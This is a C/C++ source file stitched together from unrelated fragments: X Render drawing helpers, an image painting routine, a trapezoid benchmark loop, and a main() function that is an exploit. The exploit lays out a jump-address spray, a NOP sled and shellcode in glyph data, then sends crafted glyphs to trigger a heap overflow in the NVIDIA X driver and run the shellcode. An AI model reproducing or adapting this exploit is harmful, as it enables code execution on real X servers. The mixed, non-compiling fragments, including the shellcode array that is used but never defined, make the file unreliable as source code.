void
draw_point(int x, int y, int width, int size, XftColor *color)
{
XPointDouble p[4];
p[0].x = x - size;
p[0].y = y - 1;
p[1].x = x - size;
p[1].y = y + 1;
p[2].x = x + size;
p[2].y = y + 1;
p[3].x = x + size;
p[3].y = y - 1;
XRenderCompositeDoublePoly(display, PictOpOver,
XftDrawSrcPicture(draw, color),
XftDrawPicture(draw),
XRenderFindStandardFormat(display, PictStandardA8),
0, 0, 0, 0, p, 4, 0);
p[0].x = x - 1;
p[0].y = y - size;
p[1].x = x + 1;
p[1].y = y - size;
p[2].x = x + 1;
p[2].y = y + size;
p[3].x = x - 1;
p[3].y = y + size;
XRenderCompositeDoublePoly(display, PictOpOver,
XftDrawSrcPicture(draw, color),
XftDrawPicture(draw),
XRenderFindStandardFormat(display, PictStandardA8),
0, 0, 0, 0, p, 4, 0);
}
void SetSurface(SystemDraw& w, int x, int y, int cx, int cy, const RGBA *pixels)
{
GuiLock __;
Pixmap pixmap = XCreatePixmap(Xdisplay, Xroot, cx, cy, 24);
XPicture picture = XRenderCreatePicture(
Xdisplay, pixmap,
XRenderFindStandardFormat(Xdisplay, PictStandardRGB24),
0, 0
);
XImage ximg;
sInitXImage(ximg, Size(cx, cy));
ximg.bitmap_pad = 32;
ximg.bytes_per_line = 4 * cx;
ximg.bits_per_pixel = 32;
ximg.blue_mask = 0x00ff0000;
ximg.green_mask = 0x0000ff00;
ximg.red_mask = 0x000000ff;
ximg.bitmap_unit = 32;
ximg.depth = 24;
ximg.data = (char *)pixels;
XInitImage(&ximg);
GC gc = XCreateGC(Xdisplay, pixmap, 0, 0);
XPutImage(Xdisplay, pixmap, gc, &ximg, 0, 0, 0, 0, cx, cy);
XFreeGC(Xdisplay, gc);
XFreePixmap(Xdisplay, pixmap);
XRenderComposite(Xdisplay, PictOpOver,
picture, 0, XftDrawPicture(w.GetXftDraw()),
0, 0, 0, 0, x, y, cx, cy);
XRenderFreePicture(Xdisplay, picture);
}
void XftDrawSetClipRectangles(XftDraw *draw, int xoff, int yoff, XRectangle *rects, int count)
{
if (!draw) return;
Picture pict = XftDrawPicture(draw);
XRenderSetPictureClipRectangles(draw->dpy, pict, xoff, yoff, rects, count);
}
void XftDrawSetSubwindowMode(XftDraw *draw, int mode)
{
if (!draw) return;
Picture pict = XftDrawPicture(draw);
XRenderPictureAttributes pattr;
pattr.subwindow_mode = mode;
XRenderChangePicture(draw->dpy, pict, CPSubwindowMode, &pattr);
}
void
DoFixedTrapezoids(XParms xp, Parms p, int reps)
{
int i;
Picture white, black, src, dst;
white = XftDrawSrcPicture (aadraw, &aawhite);
black = XftDrawSrcPicture (aadraw, &aablack);
dst = XftDrawPicture (aadraw);
src = black;
for (i = 0; i != reps; i++) {
XRenderCompositeTrapezoids (xp->d, PictOpOver, src, dst, maskFormat,
0, 0, traps, p->objects);
if (src == black)
src = white;
else
src = black;
CheckAbort ();
}
}
int
main(int argc, char *argv[])
{
Display *display;
Widget toplevel;
XtAppContext app_con;
XEvent event;
char c, *string;
unsigned int i;
XDataStr *data;
XExposeEvent *expose = (XExposeEvent *)&event;
unsigned int heapaddr, gotaddr;
if (argc > 2)
{
heapaddr = strtoul(argv[1],NULL,0);
gotaddr = strtoul(argv[2],NULL,0);
}
else
{
printf("Usage: %s <HEAPADDR> <GOTADDR>\n\n", argv[0]);
return 0;
}
toplevel = XtAppInitialize(&app_con, "XSafe", NULL, 0,
&argc, argv, NULL, NULL, 0);
display = XtDisplay(toplevel);
data = (XDataStr *)malloc(sizeof(XDataStr));
if (data == NULL) {
perror("malloc");
exit(EXIT_FAILURE);
}
data->display = display;
data->app = app_con;
if (createWin(data) < 0) {
fprintf(stderr, "can't create Data Window");
exit(EXIT_FAILURE);
}
show(data);
signal(SIGINT, sigHandler);
signal(SIGHUP, sigHandler);
signal(SIGQUIT, sigHandler);
signal(SIGTERM, sigHandler);
/************************************************************************
* BEGIN FONT HEAP OVERFLOW SETUP CODE
*
* "It's so hard to write a graphics driver that open-sourcing it would
* not help."
* - Andrew Fear, Software Product Manager (NVIDIA Corporation).
**********************************************************************/
XGlyphInfo * glyphs;
XRenderPictFormat fmt;
XRenderPictFormat *mask = 0;
GlyphSet gset;
char * buf =0;
int offset, cr, numB;
int xscreenpos = 32680;
int magic_len = 32768 - xscreenpos;
int wr_addr_len = 3548;
int wr_nop_len = 200;
/* Calculate the offset to the Global Offset Table.
* 0x2C0000 is the size of the buffer the NVIDIA driver
* allocates for us when it is about to draw.
*/
offset = gotaddr-(heapaddr-0x2C0000);
offset += magic_len;
glyphs = malloc(sizeof(XGlyphInfo)*3);
/* Payload glyph */
glyphs[0].width = 0x4000; /* One contiguous buffer of 16K... way more than necessary */
glyphs[0].height = 1;
glyphs[0].yOff = 0;
glyphs[0].xOff = glyphs[0].width;
glyphs[0].x = 0;
glyphs[0].y = 0;
/* Large offset glyph (untweaked) */
glyphs[1].width=0;
glyphs[1].height=0;
glyphs[1].yOff=32767;
glyphs[1].xOff=0;
glyphs[1].x = 0;
glyphs[1].y = 0;
/* Small offset glyph (tweaked) */
glyphs[2].width=0;
glyphs[2].height=0;
glyphs[2].yOff=0;
glyphs[2].xOff=0;
glyphs[2].x = 0;
glyphs[2].y = 0;
fmt.type = PictTypeDirect;
fmt.depth = 8;
Glyph * xglyphids = malloc(3*sizeof(Glyph));
xglyphids[0] = 'A';
xglyphids[1] = 'B';
xglyphids[2] = 'C';
int stride = ((glyphs[0].width*1)+3)&~3; /* Needs to be DWORD aligned */
int bufsize = stride*glyphs[0].height;
buf = malloc(bufsize);
/* Write jump address to the buffer a number of times */
for (cr=0; cr<wr_addr_len; cr+=4)
{
*((unsigned int*)((unsigned char*)buf + cr)) = gotaddr+wr_addr_len+4;
}
/* Write the NOP instructions until wr_nop_len */
memset(buf+wr_addr_len, 0x90 /* NOP */, wr_nop_len);
/* Write the shellcode */
cr+=wr_nop_len;
memcpy(buf+cr, shellcode, sizeof(shellcode));
/* Calculate the number of B's required to send */
numB = offset / (glyphs[1].yOff * magic_len);
/* We send only one C, but we change its yOff value according to
* how much space we have left before we meet the correct index length */
glyphs[2].yOff = (offset - (numB * glyphs[1].yOff * magic_len)) / (magic_len);
/* Now create a new buffer for the string data */
string = malloc(numB+1/*numC*/+1/*numA*/+1/*NULL*/);
for (cr=0; cr<numB; cr++) string[cr] = 'B';
string[cr] = 'C'; cr++;
string[cr] = 'A'; cr++;
string[cr] = 0;
mask = XRenderFindFormat(display, PictFormatType|PictFormatDepth, &fmt, 0);
gset = XRenderCreateGlyphSet(display, mask);
if (mask)
{
/* Ask the server to tie the glyphs to the glyphset we created,
* with our addr/nopslide/shellcode buffer as the alpha data.
*/
XRenderAddGlyphs(display, gset, xglyphids, glyphs, 3, buf, bufsize);
}
/* END FONT HEAP OVERFLOW SETUP CODE */
done = 0;
while (!done) {
XNextEvent(display, &event);
switch(event.type) {
case KeyPress:
i = XLookupString(&event.xkey, &c, 1, NULL, NULL);
if ((i == 1) && ((c == 'q') || (c == 'Q'))) {
done = 1;
}
break;
case Expose:
XftDrawRect(data->draw, &data->bg,
expose->x, expose->y,
expose->width, expose->height);
/* Send malignant glyphs and execute shellcode on target */
XRenderCompositeString8(display, PictOpOver,
XftDrawSrcPicture(data->draw, &data->color),
XftDrawPicture(data->draw), mask, gset,
0, 0, xscreenpos, 0, string, strlen(string));
break;
}
}
free(glyphs);
free(xglyphids);
free(buf);
free(string);
XFlush(display);
XUnmapWindow(data->display, data->win);
XUngrabKeyboard(data->display, CurrentTime);
XCloseDisplay(display);
exit(EXIT_SUCCESS);
}
void ImageSysData::Paint(SystemDraw& w, int x, int y, const Rect& src, Color c)
{
GuiLock __;
x += w.GetOffset().x;
y += w.GetOffset().y;
Size sz = img.GetSize();
int len = sz.cx * sz.cy;
Rect sr = src & sz;
Size ssz = sr.Size();
if(sr.IsEmpty())
return;
int kind = img.GetKind();
if(kind == IMAGE_EMPTY)
return;
if(kind == IMAGE_OPAQUE && !IsNull(c)) {
w.DrawRect(x, y, sz.cx, sz.cy, c);
return;
}
if(kind == IMAGE_OPAQUE && paintcount == 0 && sr == Rect(sz)) {
SetSurface(w, x, y, sz.cx, sz.cy, ~img);
paintcount++;
return;
}
if(IsNull(c)) {
if(!picture) {
bool opaque = kind == IMAGE_OPAQUE;
Pixmap pixmap = XCreatePixmap(Xdisplay, Xroot, sz.cx, sz.cy, opaque ? 24 : 32);
picture = XRenderCreatePicture(
Xdisplay, pixmap,
XRenderFindStandardFormat(Xdisplay, opaque ? PictStandardRGB24
: PictStandardARGB32),
0, 0
);
XImage ximg;
sInitXImage(ximg, sz);
ximg.bitmap_pad = 32;
ximg.bytes_per_line = 4 * sz.cx;
ximg.bits_per_pixel = 32;
ximg.blue_mask = 0x00ff0000;
ximg.green_mask = 0x0000ff00;
ximg.red_mask = 0x000000ff;
ximg.bitmap_unit = 32;
ximg.data = (char *)~img;
ximg.depth = opaque ? 24 : 32;
XInitImage(&ximg);
GC gc = XCreateGC(Xdisplay, pixmap, 0, 0);
XPutImage(Xdisplay, pixmap, gc, &ximg, 0, 0, 0, 0, sz.cx, sz.cy);
XFreeGC(Xdisplay, gc);
XFreePixmap(Xdisplay, pixmap);
SysImageRealized(img);
}
XRenderComposite(Xdisplay, PictOpOver,
picture, 0, XftDrawPicture(w.GetXftDraw()),
sr.left, sr.top, 0, 0, x, y, ssz.cx, ssz.cy);
}
else {
if(!picture8) {
Pixmap pixmap = XCreatePixmap(Xdisplay, Xroot, sz.cx, sz.cy, 8);
picture8 = XRenderCreatePicture(Xdisplay, pixmap,
XRenderFindStandardFormat(Xdisplay, PictStandardA8),
0, 0);
Buffer<byte> ab(len);
byte *t = ab;
const RGBA *s = ~img;
const RGBA *e = s + len;
while(s < e)
*t++ = (s++)->a;
XImage ximg;
sInitXImage(ximg, sz);
ximg.data = (char *)~ab;
ximg.bitmap_unit = 8;
ximg.bitmap_pad = 8;
ximg.depth = 8;
ximg.bytes_per_line = sz.cx;
ximg.bits_per_pixel = 8;
XInitImage(&ximg);
GC gc = XCreateGC(Xdisplay, pixmap, 0, 0);
XPutImage(Xdisplay, pixmap, gc, &ximg, 0, 0, 0, 0, sz.cx, sz.cy);
XFreeGC(Xdisplay, gc);
XFreePixmap(Xdisplay, pixmap);
}
XRenderComposite(Xdisplay, PictOpOver,
sGetSolidFill(c), picture8, XftDrawPicture(w.GetXftDraw()),
sr.left, sr.top, 0, 0, x, y, ssz.cx, ssz.cy);
}
}